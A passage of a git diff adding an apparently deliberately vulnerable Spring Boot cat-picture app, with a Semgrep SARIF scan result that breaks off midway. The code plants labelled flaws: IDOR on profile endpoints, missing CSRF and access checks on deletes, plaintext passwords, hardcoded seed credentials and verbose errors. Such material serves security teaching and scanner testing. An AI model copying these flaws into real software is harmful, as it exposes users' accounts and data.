b/insecure-java/src/main/java/com/example/catapp/CatApplication.java new file mode 100644 index 0000000..e69de29 diff --git a/insecure-java/src/main/java/com/example/catapp/config/DataInitializer.java b/insecure-java/src/main/java/com/example/catapp/config/DataInitializer.java new file mode 100644 index 0000000..d306ee3 --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/config/DataInitializer.java @@ -0,0 +1,80 @@ +package com.example.catapp.config; + +import com.example.catapp.models.CatPicture; +import com.example.catapp.models.Comment; +import com.example.catapp.models.User; +import com.example.catapp.repositories.CatPictureRepository; +import com.example.catapp.repositories.CommentRepository; +import com.example.catapp.repositories.UserRepository; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.boot.CommandLineRunner; +import org.springframework.stereotype.Component; + +import java.util.Arrays; +import java.util.List; + +@Component +public class DataInitializer implements CommandLineRunner { + + @Autowired + private UserRepository userRepository; + + @Autowired + private CatPictureRepository catPictureRepository; + + @Autowired + private CommentRepository commentRepository; + + @Override + public void run(String... args) { + // Create dummy users + List users = Arrays.asList( + createUser("admin", "admin123"), + createUser("john_doe", "password123"), + createUser("jane_smith", "qwerty123"), + createUser("bob_wilson", "letmein123") + ); + users.forEach(userRepository::save); + + // Create dummy cat pictures + List pictures = Arrays.asList( + createCatPicture("Fluffy", "https://placekitten.com/200/200", 1), + createCatPicture("Whiskers", "https://placekitten.com/201/201", 2), + createCatPicture("Mittens", "https://placekitten.com/202/202", 3), + createCatPicture("Shadow", "https://placekitten.com/203/203", 4), + createCatPicture("Luna", "https://placekitten.com/204/204", 1) + ); + pictures.forEach(catPictureRepository::save); + + // Create dummy comments + List comments = Arrays.asList( + createComment("What a beautiful cat! 😺", 1), + createComment("I love the colors!", 2), + createComment("This cat looks so happy!", 3), + createComment("Great photo! 📸", 4), + createComment("Adorable! ❤️", 1) + ); + comments.forEach(commentRepository::save); + } + + private User createUser(String username, String password) { + User user = new User(); + user.setUsername(username); + user.setPassword(password); // In a real app, this should be hashed + return user; + } + + private CatPicture createCatPicture(String name, String url, int ownerId) { + CatPicture picture = new CatPicture(); + picture.setName(name); + picture.setUrl(url); + picture.setOwnerId(ownerId); + return picture; + } + + private Comment createComment(String text, int userId) { + Comment comment = new Comment(); + comment.setText(text); + return comment; + } +} \ No newline at end of file diff --git a/insecure-java/src/main/java/com/example/catapp/config/GlobalExceptionHandler.java b/insecure-java/src/main/java/com/example/catapp/config/GlobalExceptionHandler.java new file mode 100644 index 0000000..603cc1e --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/config/GlobalExceptionHandler.java @@ -0,0 +1,17 @@ +package com.example.catapp.config; + +import org.springframework.http.HttpStatus; +import org.springframework.web.bind.annotation.*; + +@ControllerAdvice +public class GlobalExceptionHandler { + + // Vulnerability 4: Security Misconfiguration + @ExceptionHandler(Exception.class) + @ResponseStatus(HttpStatus.INTERNAL_SERVER_ERROR) + @ResponseBody + public String handleAllExceptions(Exception ex) { + // Detailed error messages are exposed to users + return "Error occurred: " + ex.getMessage(); + } +} diff --git a/insecure-java/src/main/java/com/example/catapp/controllers/CatPictureController.java b/insecure-java/src/main/java/com/example/catapp/controllers/CatPictureController.java new file mode 100644 index 0000000..f283a7d --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/controllers/CatPictureController.java @@ -0,0 +1,42 @@ +package com.example.catapp.controllers; + +import com.example.catapp.models.CatPicture; +import com.example.catapp.repositories.CatPictureRepository; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Controller; +import org.springframework.ui.Model; +import org.springframework.web.bind.annotation.*; +import java.util.List; + +@Controller +public class CatPictureController { + + @Autowired + private CatPictureRepository catPictureRepository; + + @GetMapping("/search") + public String searchForm() { + return "search"; // Returns search.html + } + + @PostMapping("/search") + public String search(@RequestParam String name, Model model) { + // Vulnerable to SQL Injection + List results = catPictureRepository.findByNameQuery(name); + model.addAttribute("pictures", results); + return "searchResults"; // Returns searchResults.html + } + + @GetMapping("/delete") + public String deleteForm() { + return "delete"; // Returns delete.html + } + + @PostMapping("/delete") + public String deletePicture(@RequestParam int id, Model model) { + // Vulnerable to Broken Access Control + catPictureRepository.deleteById(id); + model.addAttribute("message", "Picture deleted"); + return "deleteResult"; // Returns deleteResult.html + } +} diff --git a/insecure-java/src/main/java/com/example/catapp/controllers/CommentController.java b/insecure-java/src/main/java/com/example/catapp/controllers/CommentController.java new file mode 100644 index 0000000..677bbef --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/controllers/CommentController.java @@ -0,0 +1,47 @@ +package com.example.catapp.controllers; + +import com.example.catapp.models.Comment; +import com.example.catapp.repositories.CommentRepository; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Controller; +import org.springframework.ui.Model; +import org.springframework.web.bind.annotation.*; +import org.springframework.web.servlet.mvc.support.RedirectAttributes; + +import java.util.List; + +@Controller +public class CommentController { + + @Autowired + private CommentRepository commentRepository; + + @GetMapping("/addComment") + public String addCommentForm() { + return "addComment"; // Returns addComment.html + } + + @PostMapping("/addComment") + public String addComment(@RequestParam String commentText, Model model) { + Comment comment = new Comment(); + comment.setText(commentText); // No sanitization + commentRepository.save(comment); + model.addAttribute("message", "Comment added"); + return "addCommentResult"; // Returns addCommentResult.html + } + + @GetMapping("/comments") + public String getComments(Model model) { + List comments = commentRepository.findAll(); + model.addAttribute("comments", comments); + return "comments"; // Returns comments.html + } + + // Vulnerable Endpoint: Delete Comment without CSRF Protection + @PostMapping("/deleteComment") + public String deleteComment(@RequestParam int commentId, RedirectAttributes redirectAttributes) { + commentRepository.deleteById(commentId); + redirectAttributes.addFlashAttribute("message", "Comment deleted"); + return "redirect:/comments"; + } +} diff --git a/insecure-java/src/main/java/com/example/catapp/controllers/HomeController.java b/insecure-java/src/main/java/com/example/catapp/controllers/HomeController.java new file mode 100644 index 0000000..fb8138f --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/controllers/HomeController.java @@ -0,0 +1,15 @@ +package com.example.catapp.controllers; + +import org.springframework.stereotype.Controller; +import org.springframework.ui.Model; +import org.springframework.web.bind.annotation.GetMapping; + +@Controller +public class HomeController { + + @GetMapping("/") + public String home(Model model) { + model.addAttribute("title", "Home - Cat App"); + return "home"; + } +} diff --git a/insecure-java/src/main/java/com/example/catapp/controllers/UserController.java b/insecure-java/src/main/java/com/example/catapp/controllers/UserController.java new file mode 100644 index 0000000..93343df --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/controllers/UserController.java @@ -0,0 +1,142 @@ +package com.example.catapp.controllers; + +import com.example.catapp.models.User; +import com.example.catapp.repositories.UserRepository; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Controller; +import org.springframework.ui.Model; +import org.springframework.web.bind.annotation.*; +import org.springframework.web.servlet.mvc.support.RedirectAttributes; +import javax.servlet.http.HttpSession; + +@Controller +public class UserController { + + @Autowired + private UserRepository userRepository; + + @GetMapping("/register") + public String registerForm(Model model) { + return "register"; + } + + @PostMapping("/register") + public String register(@RequestParam String username, @RequestParam String password, + RedirectAttributes redirectAttributes, HttpSession session) { + // Check if username already exists + if (userRepository.findByUsername(username) != null) { + redirectAttributes.addFlashAttribute("error", "Username already exists"); + return "redirect:/register"; + } + + User user = new User(); + user.setUsername(username); + user.setPassword(password); // Password stored in plaintext + userRepository.save(user); + + // Auto-login after registration + session.setAttribute("userId", user.getId()); + session.setAttribute("username", user.getUsername()); + + redirectAttributes.addFlashAttribute("message", "Registration successful! Welcome " + username); + return "redirect:/"; + } + + @GetMapping("/login") + public String loginForm(HttpSession session, Model model) { + // Redirect if already logged in + if (session.getAttribute("userId") != null) { + return "redirect:/"; + } + return "login"; + } + + @PostMapping("/login") + public String login(@RequestParam String username, @RequestParam String password, + HttpSession session, Model model) { + User user = userRepository.findByUsernameAndPassword(username, password); + if (user != null) { + // Set session attributes + session.setAttribute("userId", user.getId()); + session.setAttribute("username", user.getUsername()); + return "redirect:/"; + } else { + model.addAttribute("error", "Invalid username or password"); + return "login"; + } + } + + @GetMapping("/logout") + public String logout(HttpSession session) { + session.invalidate(); + return "redirect:/login"; + } + + // Vulnerable IDOR Endpoint: View Profile + @GetMapping("/profile") + public String viewProfile(@RequestParam(required = false) Integer userId, + HttpSession session, Model model) { + // If no userId provided, show current user's profile + if (userId == null) { + userId = (Integer) session.getAttribute("userId"); + if (userId == null) { + return "redirect:/login"; + } + } + + // No authorization check; any user can view any profile + User user = userRepository.findById(userId).orElse(null); + if (user == null) { + model.addAttribute("error", "User not found"); + model.addAttribute("title", "profile.html"); + model.addAttribute("content", "profile.html :: content"); + return "layout"; + } + model.addAttribute("user", user); + model.addAttribute("title", "profile.html"); + model.addAttribute("content", "profile.html :: content"); + return "layout"; + } + + // Vulnerable IDOR Endpoint: Edit Profile + @GetMapping("/editProfile") + public String editProfileForm(@RequestParam(required = false) Integer userId, + HttpSession session, Model model) { + // If no userId provided, edit current user's profile + if (userId == null) { + userId = (Integer) session.getAttribute("userId"); + if (userId == null) { + return "redirect:/login"; + } + } + + // No authorization check + User user = userRepository.findById(userId).orElse(null); + if (user == null) { + model.addAttribute("error", "User not found"); + model.addAttribute("title", "editProfile.html"); + model.addAttribute("content", "editProfile.html :: content"); + return "layout"; + } + model.addAttribute("user", user); + model.addAttribute("title", "editProfile.html"); + model.addAttribute("content", "editProfile.html :: content"); + return "layout"; + } + + @PostMapping("/editProfile") + public String editProfile(@RequestParam Integer userId, @RequestParam String username, + @RequestParam String password, RedirectAttributes redirectAttributes) { + // No authorization check + User user = userRepository.findById(userId).orElse(null); + if (user != null) { + user.setUsername(username); + user.setPassword(password); // Still storing plaintext passwords + userRepository.save(user); + redirectAttributes.addFlashAttribute("message", "Profile updated successfully"); + } else { + redirectAttributes.addFlashAttribute("error", "User not found"); + } + return "redirect:/profile?userId=" + userId; + } +} diff --git a/insecure-java/src/main/java/com/example/catapp/models/CatPicture.java b/insecure-java/src/main/java/com/example/catapp/models/CatPicture.java new file mode 100644 index 0000000..242f7c0 --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/models/CatPicture.java @@ -0,0 +1,52 @@ +package com.example.catapp.models; + +import javax.persistence.*; + +@Entity +@Table(name = "cat_pictures") +public class CatPicture { + + @Id + @GeneratedValue(strategy = GenerationType.IDENTITY) + private int id; + + private String name; + private String url; + private int ownerId; + + // Getters and Setters + + public int getId() { + return id; + } + + // ... other getters and setters + + public void setId(int id) { + this.id = id; + } + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } + + public String getUrl() { + return url; + } + + public void setUrl(String url) { + this.url = url; + } + + public int getOwnerId() { + return ownerId; + } + + public void setOwnerId(int ownerId) { + this.ownerId = ownerId; + } +} diff --git a/insecure-java/src/main/java/com/example/catapp/models/Comment.java b/insecure-java/src/main/java/com/example/catapp/models/Comment.java new file mode 100644 index 0000000..475a167 --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/models/Comment.java @@ -0,0 +1,35 @@ +package com.example.catapp.models; + +import javax.persistence.*; + +@Entity +@Table(name = "comments") +public class Comment { + + @Id + @GeneratedValue(strategy = GenerationType.IDENTITY) + private int id; + + @Column(columnDefinition = "TEXT") + private String text; + + // Getters and Setters + + public int getId() { + return id; + } + + // ... other getters and setters + + public void setId(int id) { + this.id = id; + } + + public String getText() { + return text; + } + + public void setText(String text) { + this.text = text; + } +} diff --git a/insecure-java/src/main/java/com/example/catapp/models/User.java b/insecure-java/src/main/java/com/example/catapp/models/User.java new file mode 100644 index 0000000..745e1a7 --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/models/User.java @@ -0,0 +1,43 @@ +package com.example.catapp.models; + +import javax.persistence.Entity; +import javax.persistence.GeneratedValue; +import javax.persistence.GenerationType; +import javax.persistence.Id; +import javax.persistence.Table; + +@Entity +@Table(name = "users") +public class User { + + @Id + @GeneratedValue(strategy = GenerationType.AUTO) + private Long id; + private String username; + private String password; + + // Getters and setters + public Long getId() { + return id; + } + + public void setId(Long id) { + this.id = id; + } + + public String getUsername() { + return username; + } + + public void setUsername(String username) { + this.username = username; + } + + public String getPassword() { + return password; + } + + public void setPassword(String password) { + this.password = password; + } +} \ No newline at end of file diff --git a/insecure-java/src/main/java/com/example/catapp/repositories/CatPictureRepository.java b/insecure-java/src/main/java/com/example/catapp/repositories/CatPictureRepository.java new file mode 100644 index 0000000..824dcfc --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/repositories/CatPictureRepository.java @@ -0,0 +1,15 @@ +package com.example.catapp.repositories; + +import com.example.catapp.models.CatPicture; +import org.springframework.data.jpa.repository.JpaRepository; +import org.springframework.data.jpa.repository.Query; +import org.springframework.stereotype.Repository; +import java.util.List; + +@Repository +public interface CatPictureRepository extends JpaRepository { + + // Vulnerable method using a raw query with user input + @Query(value = "SELECT * FROM cat_pictures WHERE name = ?1", nativeQuery = true) + List findByNameQuery(String name); +} diff --git a/insecure-java/src/main/java/com/example/catapp/repositories/CommentRepository.java b/insecure-java/src/main/java/com/example/catapp/repositories/CommentRepository.java new file mode 100644 index 0000000..db373ff --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/repositories/CommentRepository.java @@ -0,0 +1,10 @@ +package com.example.catapp.repositories; + +import com.example.catapp.models.Comment; +import org.springframework.data.jpa.repository.JpaRepository; +import org.springframework.stereotype.Repository; + +@Repository +public interface CommentRepository extends JpaRepository { + // Additional query methods if needed +} diff --git a/insecure-java/src/main/java/com/example/catapp/repositories/UserRepository.java b/insecure-java/src/main/java/com/example/catapp/repositories/UserRepository.java new file mode 100644 index 0000000..3bd3cb0 --- /dev/null +++ b/insecure-java/src/main/java/com/example/catapp/repositories/UserRepository.java @@ -0,0 +1,11 @@ +package com.example.catapp.repositories; + +import com.example.catapp.models.User; +import org.springframework.data.jpa.repository.JpaRepository; +import org.springframework.stereotype.Repository; + +@Repository +public interface UserRepository extends JpaRepository { + User findByUsernameAndPassword(String username, String password); // Vulnerability: Insecure authentication + User findByUsername(String username); // Vulnerability: No rate limiting on username checks +} diff --git a/insecure-java/src/main/java/com/example/semgrep.sarif b/insecure-java/src/main/java/com/example/semgrep.sarif new file mode 100644 index 0000000..c60fbd7 --- /dev/null +++ b/insecure-java/src/main/java/com/example/semgrep.sarif @@ -0,0 +1 @@ +{"version":"2.1.0","runs":[{"invocations":[{"executionSuccessful":true,"toolExecutionNotifications":[]}],"results":[{"fingerprints":{"matchBasedId/v1":"4244fdd84a688a067fc9a1c3dcd7ca0aa221fe49a3037e666c785fabe52457b8701724b7795c5314d479f32fd5362029e505138e056e3d5f6acce978ddb3ab9d_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"catapp/controllers/CatPictureController.java","uriBaseId":"%SRCROOT%"},"region":{"endColumn":80,"endLine":25,"snippet":{"text":" String query = \"SELECT * FROM cat_pictures WHERE name = '\" + name + \"'\";"},"startColumn":24,"startLine":25}}}],"message":{"text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`connection.PreparedStatement`) or a safe library."},"properties":{},"ruleId":"java.spring.security.injection.tainted-sql-string.tainted-sql-string"},{"fingerprints":{"matchBasedId/v1":"59f7d118db27968301ef438d0a8d6f7428593b27e252833306d8992ae7cb8f8136505f4d04b98df59eaf5a2c0999ec9131309793a12ebaf606ba6a89d966ed64_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"insecurejava/UnsafeDeserializationController.java","uriBaseId":"%SRCROOT%"},"region":{"endColumn":91,"endLine":16,"snippet":{"text":" ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));"},"startColumn":13,"startLine":16}}}],"message":{"text":"Found object deserialization using ObjectInputStream. Deserializing entire Java objects is dangerous because malicious actors can create Java object streams with unintended consequences. Ensure that the objects being deserialized are not user-controlled. If this must be done, consider using HMACs to sign the data stream to make sure it is not tampered with, or consider only transmitting object fields and populating a new object."},"properties":{},"ruleId":"java.lang.security.audit.object-deserialization.object-deserialization"},{"fingerprints":{"matchBasedId/v1":"ac430243303b1787c1cad35113ff2b91fb77eaa0082a3cbba6add122a943dc2c2520fb41de86309416ff5fdd639b77ceb58c530955b69f5264f362ba2188612e_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"insecurejava/UnsafeDeserializationController.java","uriBaseId":"%SRCROOT%"},"region":{"endColumn":89,"endLine":16,"snippet":{"text":" ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));"},"startColumn":59,"startLine":16}}}],"message":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"properties":{},"ruleId":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring"},{"fingerprints":{"matchBasedId/v1":"8e4cfe18e3827129d35e37088aa12a5dc34e42f3c900ec94b375add3d92e77b37f1e38790ca7d393ed7f7a40bc97ad9c0a31af24730ce754f35144a303882d46_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"insecurejava/UnsafeDeserializationController.java","uriBaseId":"%SRCROOT%"},"region":{"endColumn":32,"endLine":20,"snippet":{"text":" e.printStackTrace();"},"startColumn":13,"startLine":20}}}],"message":{"text":"Possible active debug code detected. Deploying an application with debug code can create unintended entry points or expose sensitive information."},"properties":{},"ruleId":"java.lang.security.audit.active-debug-code-printstacktrace.active-debug-code-printstacktrace"}],"tool":{"driver":{"name":"Semgrep OSS","rules":[{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","id":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","name":"swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.pkcs5-hardcoded-secret.pkcs5-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"help":{"markdown":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf)\n - [https://cwe.mitre.org/data/definitions/918.html](https://cwe.mitre.org/data/definitions/918.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Many different options exist to fix this issue depending the use case (Application can send request only to identified and trusted applications, Application can send requests to ANY external IP address or domain name)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.ssrf.web-request.ssrf","id":"csharp.lang.security.ssrf.web-request.ssrf","name":"csharp.lang.security.ssrf.web-request.ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.ssrf.web-request.ssrf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","id":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","name":"swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.scrypt-hardcoded-secret.scrypt-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"help":{"markdown":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n","text":"External entities are allowed for $DBFACTORY. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://xml.org/sax/features/external-general-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","id":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","name":"java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-external-general-entities-true.documentbuilderfactory-external-general-entities-true"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command)\n - [http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command](http://docs.paramiko.org/en/stable/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py](https://github.com/PyCQA/bandit/blob/d5f8fa0d89d7b11442fc6ec80ca42953974354c8/bandit/plugins/injection_paramiko.py)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context()' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","id":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","name":"python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.paramiko.paramiko-exec-command.paramiko-exec-command"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host)\n - [https://goteleport.com/blog/ssrf-attacks/](https://goteleport.com/blog/ssrf-attacks/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","id":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","name":"go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.ssrf.grpc-tainted-url-host.grpc-tainted-url-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path."},"help":{"markdown":"The alias in this location block is subject to a path traversal because the location path does not end in a path separator (e.g., '/'). To fix, add a path separator to the end of the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.alias-path-traversal.alias-path-traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)\n - [https://www.youtube.com/watch?v=CIhHpkybYsY](https://www.youtube.com/watch?v=CIhHpkybYsY)\n - 